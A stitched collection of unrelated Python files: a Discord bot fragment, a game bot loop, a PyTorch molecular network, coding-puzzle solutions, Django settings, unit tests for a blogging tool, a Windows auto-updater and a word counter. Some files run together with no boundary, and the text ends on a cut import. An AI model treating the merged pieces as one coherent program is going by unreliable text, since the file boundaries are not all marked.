    with open('logchannels.json', 'r') as fp:
        mapping = json.load(fp)
    mapping[str(ctx.guild.id)] = newid
    with open('logchannels.json', 'w') as fp:
        json.dump(mapping, fp, indent=4)
# token
# SECURITY: a bot token was previously hard-coded on this line. A token
# committed to source control is compromised and must be regenerated;
# read the (new) token from the environment instead.
import os
bot.run(os.environ["DISCORD_BOT_TOKEN"])
|
import api
import ai
import time

# Outer loop: obtain a fresh login token whenever the inner game loop
# breaks out (e.g. the session expired or an API call failed).
while True:
    token = api.login()
    while True:
        try:
            game_id, card = api.begin_game(token)
            res = ai.solve(card)
            api.play(game_id, res, token)
            print("--------比赛结果---------")
            time.sleep(1)
            # api.get_detail(token,game_id)
            api.get_game_list(token)
            print("-------------------")
            print()
        except Exception:
            # Narrowed from a bare `except:` so Ctrl-C (KeyboardInterrupt)
            # can stop the bot; any API failure falls through to re-login.
            break
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class PairNet(nn.Module):
    """Three-layer MLP (dim_in -> 512 -> 256 -> dim_out) with ReLU hidden layers."""

    def __init__(self, dim_in, dim_out):
        super(PairNet, self).__init__()
        self.fc1 = nn.Linear(dim_in, 512)
        self.fc2 = nn.Linear(512, 256)
        self.fc3 = nn.Linear(256, dim_out)

    def forward(self, x):
        hidden = F.relu(self.fc1(x))
        hidden = F.relu(self.fc2(hidden))
        return self.fc3(hidden)
class TripletNet(nn.Module):
    """Three-layer MLP (dim_in -> 1024 -> 256 -> dim_out) with ReLU hidden layers."""

    def __init__(self, dim_in, dim_out):
        super(TripletNet, self).__init__()
        self.fc1 = nn.Linear(dim_in, 1024)
        self.fc2 = nn.Linear(1024, 256)
        self.fc3 = nn.Linear(256, dim_out)

    def forward(self, x):
        hidden = F.relu(self.fc1(x))
        hidden = F.relu(self.fc2(hidden))
        return self.fc3(hidden)
class TGNN(nn.Module):
    """Network over concatenated atom-pair / atom-triplet feature rows.

    Atoms and bonds are embedded to 128 dims, pair/triplet MLPs map the
    concatenated embeddings to 1024 dims, `readout` mean-pools each
    molecule's rows, and a 3-layer head regresses to `dim_target`.
    """

    def __init__(self, num_atom_feats, num_bond_feats, dim_target):
        super(TGNN, self).__init__()
        self.num_atom_feats = num_atom_feats
        self.num_bond_feats = num_bond_feats
        self.atom_net = nn.Linear(self.num_atom_feats, 128)
        self.bond_net = nn.Linear(self.num_bond_feats, 128)
        # pair: 2 atoms + 1 bond; triplet: 3 atoms + 2 bonds (128 dims each).
        self.pair_net = PairNet(2 * 128 + 128, 1024)
        self.triplet_net = TripletNet(3 * 128 + 2 * 128, 1024)
        # +1 for the scalar ref_feats column concatenated in forward().
        self.fc1 = nn.Linear(2 * 1024 + 1, 512)
        self.fc2 = nn.Linear(512, 32)
        self.fc3 = nn.Linear(32, dim_target)

    def forward(self, pairs, idx_pairs, triplets, idx_triplets, ref_feats):
        """Score molecules; idx_* give per-molecule row counts in pairs/triplets."""
        naf = self.num_atom_feats
        nbf = self.num_bond_feats
        # Pair rows are laid out as [atom1 | atom2 | bond].
        atom_emb1 = F.relu(self.atom_net(pairs[:, :naf]))
        atom_emb2 = F.relu(self.atom_net(pairs[:, naf:2*naf]))
        bond_emb = F.relu(self.bond_net(pairs[:, 2*naf:]))
        h_pair = self.readout(self.pair_net(torch.cat([atom_emb1, atom_emb2, bond_emb], dim=1)), idx_pairs)
        # Triplet rows are laid out as [atom1 | atom2 | atom3 | bond1 | bond2].
        atom_emb1 = F.relu(self.atom_net(triplets[:, :naf]))
        atom_emb2 = F.relu(self.atom_net(triplets[:, naf:2*naf]))
        atom_emb3 = F.relu(self.atom_net(triplets[:, 2*naf:3*naf]))
        bond_emb1 = F.relu(self.bond_net(triplets[:, 3*naf:3*naf+nbf]))
        bond_emb2 = F.relu(self.bond_net(triplets[:, 3*naf+nbf:]))
        h_triplet = self.readout(self.triplet_net(torch.cat([atom_emb1, atom_emb2, atom_emb3, bond_emb1, bond_emb2], dim=1)), idx_triplets)
        h = F.relu(self.fc1(torch.cat([h_pair, h_triplet, ref_feats], dim=1)))
        h = F.relu(self.fc2(h))
        out = self.fc3(h)
        return out

    def readout(self, x, idx):
        """Mean-pool consecutive row chunks of `x`; chunk i spans idx[i] rows.

        Returns a (len(idx), x.shape[1]) tensor. FIX: the buffer was
        hard-coded to `.cuda()`, which crashed on CPU-only machines; it is
        now allocated on the same device as `x`.
        """
        h = torch.empty((idx.shape[0], x.shape[1]), dtype=torch.float,
                        device=x.device)
        pos = 0
        for i in range(0, idx.shape[0]):
            h[i, :] = torch.mean(x[pos:pos+idx[i], :], dim=0)
            pos += idx[i]
        return h
|
"""
Given a binary tree, each node has value 0 or 1.
Each root-to-leaf path represents a binary number starting with the most significant bit.
For example, if the path is 0 -> 1 -> 1 -> 0 -> 1, then this could represent 01101 in binary, which is 13.
For all leaves in the tree, consider the numbers represented by the path from the root to that leaf.
Return the sum of these numbers.
Input: [1,0,1,0,1,0,1] -> preorder traversal
Output: 22
Explanation: (100) + (101) + (110) + (111) = 4 + 5 + 6 + 7 = 22
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
def dfs2(node, parent_sum=None):
    """Return the sum of root-to-leaf binary numbers in the subtree at *node*.

    Each node holds one bit (0/1); *parent_sum* is the integer value of the
    path from the root down to (but excluding) *node*. A None tree sums to 0.
    """
    if parent_sum is None:  # `is None`, not `== None` (PEP 8); also clearer intent
        parent_sum = 0
    if node is None:
        return 0
    # Shift the accumulated value left one bit and append this node's bit.
    parent_sum = parent_sum * 2 + node.val
    if node.left or node.right:
        # Internal node: accumulate over both subtrees (a missing child adds 0).
        return dfs2(node.left, parent_sum) + dfs2(node.right, parent_sum)
    # Leaf: the accumulated path value is one complete binary number.
    return parent_sum
class Solution:
    def sumRootToLeaf(self, root: TreeNode) -> int:
        """Sum all root-to-leaf binary numbers by delegating to `dfs2` above."""
        return dfs2(root)
# I, Alvin Radoncic, abide by the Stevens Honor Code
# Problem 2, Homework 5
# This program accepts a list of numbers and returns the sum of the numbers.
def summed_list():
    """Prompt for N numbers, echo the running sum, then print the final sum."""
    number_of_terms = int(input("How many numbers do you want to list? "))
    total = 0  # renamed from `sum`, which shadowed the builtin of the same name
    for i in range(number_of_terms):
        x = float(input("Enter any number: "))
        total = total + x
        print("The current sum is", total)
        print()
    print("The sum of all inputted numbers is: " + str(total))


summed_list()
|
class Solution:
    # @param A : string
    # @return an integer
    def solve(self, A):
        """Return the minimum number of characters to prepend to make A a palindrome.

        Characters may only be added at the front, so the answer is
        len(A) minus the length of the longest palindromic PREFIX of A.
        The original recursive `is_pal` helper sliced on every call
        (quadratic per check) and could hit the recursion limit on long
        strings; a slice-reversal comparison is O(n) and iterative.
        """
        if len(A) <= 1:
            return 0
        for i in range(len(A), 0, -1):
            prefix = A[:i]
            if prefix == prefix[::-1]:
                return len(A) - i
|
import os
# Django settings module. Secrets come from an uncommitted
# settings_production module when deployed; otherwise the module falls
# back to settings_local and enables DEBUG.
ADMINS = (
    ('Przemyslaw Pietrzkiewicz', 'pietrzkiewicz@gmail.com'),
)
MANAGERS = ADMINS
try:
    # Production deployment: database, secret key, mail and S3 settings
    # all live outside version control.
    from settings_production import DATABASES
    from settings_production import SECRET_KEY
    from settings_production import EMAIL_HOST
    from settings_production import EMAIL_HOST_USER
    from settings_production import EMAIL_HOST_PASSWORD
    from settings_production import DEFAULT_FROM_EMAIL
    from settings_production import SERVER_EMAIL
    from settings_production import EMAIL_USE_TLS
    from settings_production import S3BUCKET
    PRODUCTION_SETTINGS = True
except ImportError:
    # Development fallback: only the database and secret key are required.
    from settings_local import DATABASES
    from settings_local import SECRET_KEY
    PRODUCTION_SETTINGS = False
# Debug mirrors the environment: on locally, off in production.
DEBUG = not PRODUCTION_SETTINGS
TEMPLATE_DEBUG = DEBUG
TIME_ZONE = 'Europe/Warsaw'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
USE_L10N = True
# All filesystem paths below are derived from this module's directory.
PROJECT_PATH = os.path.abspath(os.path.split(__file__)[0])
MEDIA_ROOT = os.path.join(PROJECT_PATH, "site_media", "upload")
MEDIA_URL = "/site_media/upload/"
STATIC_ROOT = os.path.join(PROJECT_PATH, "site_media", "native")
STATIC_URL = '/site_media/native/'
STATICFILES_DIRS = (
    ("", os.path.join(PROJECT_PATH, "static")),
    ("scripts", os.path.join(PROJECT_PATH, "songs", "scripts")),
)
# Make this unique, and don't share it with anybody.
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
)
if DEBUG:
    # The debug toolbar is only wired up for local development runs.
    MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
ROOT_URLCONF = 'urls'
# utf-8-sig tolerates BOM markers left in files by Windows editors.
FILE_CHARSET = "utf-8-sig"
TEMPLATE_CONTEXT_PROCESSORS = (
    'django.contrib.auth.context_processors.auth',
    'django.core.context_processors.debug',
    'django.core.context_processors.media',
    'django.core.context_processors.static',
    'django.core.context_processors.request',
    'django.contrib.messages.context_processors.messages',
    'songs.views.songs_context'
)
TEMPLATE_DIRS = (
    os.path.join(PROJECT_PATH, "templates"),
)
# Haystack full-text search backed by a local Whoosh index.
HAYSTACK_SITECONF = 'search_sites'
HAYSTACK_SEARCH_ENGINE = 'whoosh'
HAYSTACK_WHOOSH_PATH = os.path.join(PROJECT_PATH, "index")
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.admin',
    'django.contrib.staticfiles',
    'blog',
    'artists',
    'songs',
    'events',
    'users',
    'frontpage',
    'dxlibrary',
    'haystack',
    'south',
)
if DEBUG:
    INSTALLED_APPS += ('debug_toolbar',)
    INTERNAL_IPS = ('127.0.0.1',)
|
# -*- encoding: utf-8 -*-
import datetime
import os
import unittest
from io import StringIO
from textwrap import dedent
import jinja2
import mocker
from bloggertool.exceptions import FileNotFoundError, UserCancel, ConfigError
from bloggertool.str_util import Template as _
from bloggertool.config import Config
from bloggertool.config.post import Post
class SampleIO(StringIO):
    """StringIO that snapshots its final contents into `val` on context exit.

    Used by the tests below: mocked `open(...)` returns a SampleIO, and the
    snapshot lets assertions read what was written after the file "closes".
    """
    def __init__(self):
        super(SampleIO, self).__init__()
        self.val = None  # filled with the buffer contents by __exit__
    def __exit__(self, exc_type, exc_val, exc_tb):
        # Capture the buffer before StringIO tears itself down on close.
        self.val = self.getvalue()
        return super(SampleIO, self).__exit__(exc_type, exc_val, exc_tb)
class TestPost(unittest.TestCase):
    """Unit tests for bloggertool's Post model using `mocker` expectations.

    NOTE: the mocker expectations are order- and count-sensitive; the
    filesystem (`fs._impl`) and user-prompt (`_ask`) collaborators are
    replaced by mocks in setUp, so no real I/O happens.
    """
    def setUp(self):
        # Post under test points at dir/file.md inside a fake project root.
        self.config = Config(os.path.abspath('project-root'))
        self.post = Post(self.config, 'name', 'dir/file.md')
        self.mocker = mocker.Mocker()
        self.log = self.mocker.mock()
        self.post.log = self.log
        self.fs = self.config.fs
        self.fs._impl = self.mocker.mock()
        self.ask = self.mocker.mock()
        self.config._ask = self.ask
    def test_ctor(self):
        self.assertEqual('name', self.post.name)
        self.assertEqual('dir/file.md', self.post.file)
        self.assertEqual('name', self.post.slug)
    def test_inner_html_path(self):
        with self.mocker:
            self.assertEqual('dir/file.inner.html', self.post.inner_html_path)
    def test_nice_html_path(self):
        with self.mocker:
            self.assertEqual('dir/file.html', self.post.nice_html_path)
    def test_is_html_fresh_inner_not_found(self):
        # Missing inner html means the rendered output is stale.
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        self.post.config.fs._impl.exists(full_inner_html_path)
        self.mocker.result(False)
        with self.mocker:
            self.assertFalse(self.post.is_html_fresh)
    def test_is_html_fresh_nice_not_found(self):
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        self.post.config.fs._impl.exists(full_inner_html_path)
        self.mocker.result(True)
        self.post.config.fs._impl.exists(full_nice_html_path)
        self.mocker.result(False)
        with self.mocker:
            self.assertFalse(self.post.is_html_fresh)
    def test_is_html_fresh_is_ok(self):
        # Both rendered files exist and are newer than the markdown source.
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        self.post.config.fs._impl.exists(full_mdpath)
        self.mocker.result(True)
        self.post.config.fs._impl.exists(full_inner_html_path)
        self.mocker.result(True)
        self.mocker.count(2)
        self.post.config.fs._impl.exists(full_nice_html_path)
        self.mocker.result(True)
        self.mocker.count(2)
        self.post.config.fs._impl.getmtime(full_mdpath)
        self.mocker.result(5)
        self.post.config.fs._impl.getmtime(full_inner_html_path)
        self.mocker.result(10)
        self.post.config.fs._impl.getmtime(full_nice_html_path)
        self.mocker.result(15)
        with self.mocker:
            self.assertTrue(self.post.is_html_fresh)
    def test_is_html_fresh_is_inner_expired(self):
        # inner.html older than the .md source -> stale.
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        self.post.config.fs._impl.exists(full_mdpath)
        self.mocker.result(True)
        self.post.config.fs._impl.exists(full_inner_html_path)
        self.mocker.result(True)
        self.mocker.count(2)
        self.post.config.fs._impl.exists(full_nice_html_path)
        self.mocker.result(True)
        self.mocker.count(2)
        self.post.config.fs._impl.getmtime(full_mdpath)
        self.mocker.result(5)
        self.post.config.fs._impl.getmtime(full_inner_html_path)
        self.mocker.result(1)
        self.post.config.fs._impl.getmtime(full_nice_html_path)
        self.mocker.result(15)
        with self.mocker:
            self.assertFalse(self.post.is_html_fresh)
    def test_is_html_fresh_is_nice_expired(self):
        # nice .html older than inner.html -> stale.
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        self.post.config.fs._impl.exists(full_mdpath)
        self.mocker.result(True)
        self.post.config.fs._impl.exists(full_inner_html_path)
        self.mocker.result(True)
        self.mocker.count(2)
        self.post.config.fs._impl.exists(full_nice_html_path)
        self.mocker.result(True)
        self.mocker.count(2)
        self.post.config.fs._impl.getmtime(full_mdpath)
        self.mocker.result(5)
        self.post.config.fs._impl.getmtime(full_inner_html_path)
        self.mocker.result(6)
        self.post.config.fs._impl.getmtime(full_nice_html_path)
        self.mocker.result(1)
        with self.mocker:
            self.assertFalse(self.post.is_html_fresh)
    def test_refresh_html_fresh(self):
        # Fresh output: refresh_html is a no-op and reports False.
        mock = self.mocker.patch(self.post)
        mock.is_html_fresh
        self.mocker.result(True)
        with self.mocker:
            self.assertFalse(self.post.refresh_html())
    def test_refresh_html_cannot_change_published_slug(self):
        # A published post (postid set) must not silently change its slug.
        self.config.interactive = False
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        self.post.postid = 'some postid'
        self.post.config.fs._impl.exists(full_mdpath)
        self.mocker.result(True)
        self.mocker.count(1, None)
        self.config.fs._impl.open(full_mdpath, 'r', 'utf-8')
        self.mocker.result(StringIO(dedent(u"""\
            Title: Заголовок
            slug: article-slug
            labels: one, two
                three
            Текст статьи
            """)))
        self.log.info('Generate html for name')
        with self.mocker:
            self.assertRaises(ConfigError, self.post.refresh_html, True)
    def test_refresh_html_with_template(self):
        # Full render through a jinja2 template; metadata is read from the
        # markdown header and the user confirms each overwrite.
        self.config.interactive = None
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        self.post.title = self.post.slug = 'garbage'
        self.post.labels = ['garbage']
        self.ask(mocker.ANY, 'y/N/q')
        self.mocker.result('y')
        self.mocker.count(3)
        self.post.config.fs._impl.exists(full_mdpath)
        self.mocker.result(True)
        self.mocker.count(1, None)
        self.config.fs._impl.open(full_mdpath, 'r', 'utf-8')
        self.mocker.result(StringIO(dedent(u"""\
            Title: Заголовок
            slug: article-slug
            labels: one, two
                three
            Текст статьи
            """)))
        inner_body = SampleIO()
        self.config.fs._impl.open(full_inner_html_path, 'w', 'utf-8')
        self.mocker.result(inner_body)
        nice_body = SampleIO()
        self.config.fs._impl.open(full_nice_html_path, 'w', 'utf-8')
        self.mocker.result(nice_body)
        self.config.info.template_dir = 'dir'
        self.config.info.template_file = 'tmpl'
        TEMPLATE = dedent("""\
            <html>
            <head>
            <title>{{title}}</title>
            </head>
            <body>
            <h1>{{title}}</h1>
            <p>Slug: {{slug}}</p>
            <p>Labels: {{labels}}</p>
            <hr>
            {{inner}}
            </body>
            </html>""")
        env = jinja2.Environment(loader=jinja2.DictLoader({'tmpl': TEMPLATE}))
        self.config.info._template_env = env
        self.log.info('Generate html for name')
        with self.mocker:
            self.assertTrue(self.post.refresh_html(True))
            self.assertEqual(u'Заголовок', self.post.title)
            self.assertEqual(u'article-slug', self.post.slug)
            self.assertEqual(', '.join(sorted(['one', 'two', 'three'])),
                             self.post.labels_str)
            self.assertEqual(u'<p>Текст статьи</p>', inner_body.val)
            expected = dedent(u"""\
                <html>
                <head>
                <title>Заголовок</title>
                </head>
                <body>
                <h1>Заголовок</h1>
                <p>Slug: article-slug</p>
                <p>Labels: [u'one', u'three', u'two']</p>
                <hr>
                <p>Текст статьи</p>
                </body>
                </html>""")
            self.assertEqual(expected, nice_body.val)
    def test_refresh_html_without_template(self):
        # No template configured: nice html falls back to the raw markdown output.
        self.config.interactive = None
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        self.post.title = self.post.slug = 'garbage'
        self.post.labels = ['garbage']
        self.ask(mocker.ANY, 'y/N/q')
        self.mocker.result('y')
        self.mocker.count(3)
        self.post.config.fs._impl.exists(full_mdpath)
        self.mocker.result(True)
        self.mocker.count(1, None)
        self.config.fs._impl.open(full_mdpath, 'r', 'utf-8')
        self.mocker.result(StringIO(dedent(u"""\
            Title: Заголовок
            slug: article-slug
            labels: one, two
                three
            Текст статьи
            """)))
        inner_body = SampleIO()
        self.config.fs._impl.open(full_inner_html_path, 'w', 'utf-8')
        self.mocker.result(inner_body)
        nice_body = SampleIO()
        self.config.fs._impl.open(full_nice_html_path, 'w', 'utf-8')
        self.mocker.result(nice_body)
        self.log.info('Generate html for name')
        self.log.warning("User settings has no template specified.\n"
                         "Use markdown output as html.")
        with self.mocker:
            self.assertTrue(self.post.refresh_html(True))
            self.assertEqual(u'Заголовок', self.post.title)
            self.assertEqual(u'article-slug', self.post.slug)
            self.assertEqual(', '.join(sorted(['one', 'two', 'three'])),
                             self.post.labels_str)
            self.assertEqual(u'<p>Текст статьи</p>', inner_body.val)
            self.assertEqual(u'<p>Текст статьи</p>', nice_body.val)
    def test_inner_html(self):
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        mock = self.mocker.patch(self.post)
        mock.refresh_html(False)
        self.mocker.result(False)
        self.post.config.fs._impl.exists(full_inner_html_path)
        self.mocker.result(True)
        self.mocker.count(1, None)
        self.config.fs._impl.open(full_inner_html_path, 'r', 'utf-8')
        self.mocker.result(StringIO(u'<p>Текст статьи</p>'))
        with self.mocker:
            self.assertEqual(u'<p>Текст статьи</p>',
                             self.post.inner_html())
    def test_nice_html(self):
        full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
        full_inner_html_path = os.path.join(self.fs.root,
                                            'dir/file.inner.html')
        full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
        mock = self.mocker.patch(self.post)
        mock.refresh_html(True)
        self.mocker.result(True)
        self.post.config.fs._impl.exists(full_nice_html_path)
        self.mocker.result(True)
        self.mocker.count(1, None)
        self.config.fs._impl.open(full_nice_html_path, 'r', 'utf-8')
        self.mocker.result(StringIO(u'<p>Текст статьи</p>'))
        with self.mocker:
            self.assertEqual(u'<p>Текст статьи</p>',
                             self.post.nice_html(True))
    def test_overwrite_attr_not_changed(self):
        self.post.slug = 'slug'
        with self.mocker:
            self.post.overwrite_attr('slug', 'slug')
            self.assertEqual('slug', self.post.slug)
    def test_overwrite_attr_empty(self):
        # An empty current value is overwritten without prompting.
        self.config.interactive = True
        self.post.slug = ''
        with self.mocker:
            self.post.overwrite_attr('slug', 'slug2')
            self.assertEqual('slug2', self.post.slug)
    def test_overwrite_attr_no(self):
        # Non-interactive mode refuses the change and warns.
        self.config.interactive = False
        self.post.slug = 'slug'
        self.log.warning(u'Skip slug modification for name')
        with self.mocker:
            self.post.overwrite_attr('slug', 'slug2')
            self.assertEqual('slug', self.post.slug)
    def test_overwrite_attr_yes(self):
        self.config.interactive = True
        self.post.slug = 'slug'
        with self.mocker:
            self.post.overwrite_attr('slug', 'slug2')
            self.assertEqual('slug2', self.post.slug)
    def test_overwrite_attr_interactive_yes(self):
        # interactive=None means "ask the user"; 'y' accepts the change.
        self.config.interactive = None
        self.post.slug = 'slug'
        self.ask(_("""
            New slug: slug2
            is different from existing slug: slug
            for post name
            Do you like to override?"""), 'y/N/q')
        self.mocker.result('y')
        with self.mocker:
            self.post.overwrite_attr('slug', 'slug2')
            self.assertEqual('slug2', self.post.slug)
    def test_overwrite_attr_interactive_no(self):
        self.config.interactive = None
        self.post.slug = 'slug'
        self.ask(_("""
            New slug: slug2
            is different from existing slug: slug
            for post name
            Do you like to override?"""), 'y/N/q')
        self.mocker.result('n')
        self.log.warning('Skip slug modification for name')
        with self.mocker:
            self.post.overwrite_attr('slug', 'slug2')
            self.assertEqual('slug', self.post.slug)
    def test_overwrite_attr_interactive_quit(self):
        # 'q' aborts the whole operation via UserCancel.
        self.config.interactive = None
        self.post.slug = 'slug'
        self.ask(_("""
            New slug: slug2
            is different from existing slug: slug
            for post name
            Do you like to override?"""), 'y/N/q')
        self.mocker.result('q')
        with self.mocker:
            self.assertRaises(UserCancel, self.post.overwrite_attr,
                              'slug', 'slug2')
    def fill_post(self):
        # Helper: populate the post with representative metadata.
        self.post.title = 'Post Title'
        self.post.link = 'link'
        self.post.labels = ['a', 'b']
        self.post.postid = 'postid'
        #self.localstamp = datetime.datetime(2011, 2, 21, 22, 32, 05)
    def test_info_list_not_changed_short(self):
        self.fill_post()
        self.post.changed = False
        with self.mocker:
            self.assertEqual('name', self.post.info_list(False))
    def test_info_list_changed_short(self):
        # A leading '*' marks posts with unsaved changes.
        self.fill_post()
        self.post.changed = True
        with self.mocker:
            self.assertEqual('*name', self.post.info_list(False))
    def test_info_list_not_changed_long(self):
        self.fill_post()
        self.post.changed = False
        with self.mocker:
            self.assertEqual(dedent("""\
            name
            title: Post Title
            link: link
            slug: name
            labels: a, b
            postid: postid
            published: None
            updated: None
            localstamp: None"""), self.post.info_list(True))
    def test_info_list_changed_long(self):
        self.fill_post()
        self.post.changed = True
        with self.mocker:
            self.assertEqual(dedent("""\
            *name
            title: Post Title
            link: link
            slug: name
            labels: a, b
            postid: postid
            published: None
            updated: None
            localstamp: None"""), self.post.info_list(True))
|
#!/bin/python
# Script updater.py
# Check update for application to the latest version
import urllib.request as request
import os.path as path
import os
import ctypes
import logging
# define
OK = 1   # status code: operation succeeded
NOK = 0  # status code: operation failed
# Application root is three directories above the current working directory;
# the log file lives in its 'log' subfolder.
htpdir = path.abspath(path.join(os.getcwd(), '../../..'))
log_file = path.join(htpdir + '\\log','updater.log')
os.makedirs(os.path.dirname(log_file), exist_ok=True)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# Create handler (mode='w' truncates the log on every run)
handler = logging.FileHandler(log_file, mode='w')
handler.setLevel(logging.INFO)
# Create logging format
formatter = logging.Formatter('%(asctime)s %(levelname)s : %(message)s')
handler.setFormatter(formatter)
# Add handler to logger
logger.addHandler(handler)
def remove_dot(input):
    """Return *input* with every '.' removed (e.g. '1.2.3' -> '123')."""
    return input.replace('.', '')
def get_local_version():
    """Read the local 'update' file and return the version digits without dots."""
    version_file = path.join(os.getcwd(), 'update')
    with open(version_file, 'r') as fh:
        first_line = fh.readline()
    stripped = str(first_line).rstrip('\r\n')
    # Drop the 'CurrentVersion:' prefix (15 characters).
    return remove_dot(stripped[15:])
def compare_version(local, remote):
    """Return 1 when *remote* is newer than *local*, else 0.

    Versions arrive as dot-stripped digit strings. FIX: the original
    compared the strings lexicographically, so e.g. '99' < '100' was
    False and the update was skipped; compare numerically instead.
    """
    logger.info("Current Local version [%s]" % local)
    logger.info("Latest Remote version [%s]" % remote)
    needUpdate = 0
    if int(local) == int(remote):
        logger.info("No update. Application has the latest version")
    elif int(local) < int(remote):
        needUpdate = 1
        logger.info("Require update to the latest version")
    return needUpdate
def get_remote_version():
    """Fetch the remote update.txt and return its version digits without dots."""
    response = request.urlopen('https://raw.githubusercontent.com/hafizhamdi/updater/master/update.txt')
    first_line = str(response.readline(), 'utf-8').strip()
    # Drop the version-label prefix (14 characters).
    return remove_dot(first_line[14:])
def confirm(local, remote):
    """Show a Win32 message box asking to download; return the button code (1 = OK)."""
    prompt = 'Current v%s. Confirm download the latest patches v%s?' % (local, remote )
    return ctypes.windll.user32.MessageBoxW(None, prompt, 'Confirm', 1)
def padzero(version):
    """Zero-pad *version* on the left to at least five characters."""
    text = str(version)
    return text.zfill(5)
def backup():
    """Run backup.bat from the bin directory; return OK on success, NOK otherwise."""
    import subprocess as p
    sts = NOK
    try:
        bindir = path.abspath(path.join(os.getcwd(),'../..'))
        bkpscr = path.join(bindir, 'backup.bat')
        p.call([bkpscr,'/b'])
        logger.info("Backup files... success")
        sts = OK
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate.
        logger.error("Backup files error")
        sts = NOK
    finally:
        # NOTE(review): `return` in finally would swallow any uncaught
        # exception; kept for behavioral compatibility with the original.
        return sts
def download(version):
    """Download and extract the patch zip for *version*; return OK/NOK.

    Shows a Win32 message box with the outcome either way.
    """
    import requests,zipfile,io
    sts = NOK
    try:
        patch = 'Patches/HFX' + padzero(version) + '/HISHTPService.zip'
        url = 'https://github.com/hafizhamdi/updater/raw/master/' + patch
        logger.info(url)
        r = requests.get(url)
        logger.info("Request return %s" % (r.ok))
        z = zipfile.ZipFile(io.BytesIO(r.content))
        cfolder = path.abspath(path.join(os.getcwd(), '../../../..'))
        z.extractall(cfolder)
        MessageBoxW = ctypes.windll.user32.MessageBoxW
        MessageBoxW(None, 'Program has successfully updated', 'HISHTPService Updating...', 1)
        sts = OK
    except Exception:
        # Narrowed from a bare `except:`; record the reason before alerting.
        logger.exception("Patch download/extract failed")
        MessageBoxW = ctypes.windll.user32.MessageBoxW
        MessageBoxW(None, 'Updating Error', 'Updating...', 1)
        sts = NOK
    finally:
        return sts
def append_dot(version):
    """Insert a '.' between every character of *version* (e.g. '123' -> '1.2.3').

    Replaces the manual concatenate-then-trim loop with `str.join`,
    which is the idiomatic (and linear-time) form of the same operation.
    """
    return '.'.join(version)
def update_localv(ver):
    """Rewrite the local 'update' file with the freshly-installed version *ver*."""
    try:
        with open('update','w') as f:
            f.write('CurrentVersion:' + append_dot(ver))
        logger.info("Updating local version %s success" % (ver))
    except OSError:
        # Narrowed from a bare `except:`; only file-I/O failures are expected.
        logger.error("Updating local version failed.")
def stop_services():
    """Run stop_services.bat (stops HISHTP Service / Print Watcher); return OK/NOK.

    BUG FIX: the original called `p.call([bkpscr])` with an undefined
    name; the resulting NameError was swallowed by the bare `except:`,
    so the services were never actually stopped.
    """
    import subprocess as p
    sts = NOK
    try:
        bindir = path.abspath(path.join(os.getcwd(),'../..'))
        stopscr = path.join(bindir, 'stop_services.bat')
        p.call([stopscr])
        logger.info("Stop services... success")
        sts = OK
    except Exception:
        logger.error("Stop services error")
        sts = NOK
    finally:
        return sts
# Main update flow: compare versions, ask the user, stop services,
# back up, download/extract the patch, then record the new version.
remote = get_remote_version()
local = get_local_version()
if 1 == compare_version(local,remote):
    #print(confirm())
    if 1 == confirm(local,remote):
        ss = stop_services() # Stop running services HISHTP Service and Print Watcher
        if OK == backup(): # Backup data to bkp under C directory
            if OK == download(remote): # Check downloading
                update_localv(remote) # Success, update local version
# Count word frequencies in the input file and print the most frequent
# word (ties broken by alphabetical order, matching the sorted scan).
wordcount = {}
c = 0
x = ''
with open('dataset_3363_3.txt') as inf:
    for line in inf:
        for token in line.strip().lower().split():
            wordcount[token] = wordcount.get(token, 0) + 1
for word, count in sorted(wordcount.items()):
    if count > c:
        c = count
        x = word
print(x, c)
from torch.utils.data import DataLoader
from parseridge.corpus.training_data import ConLLDataset
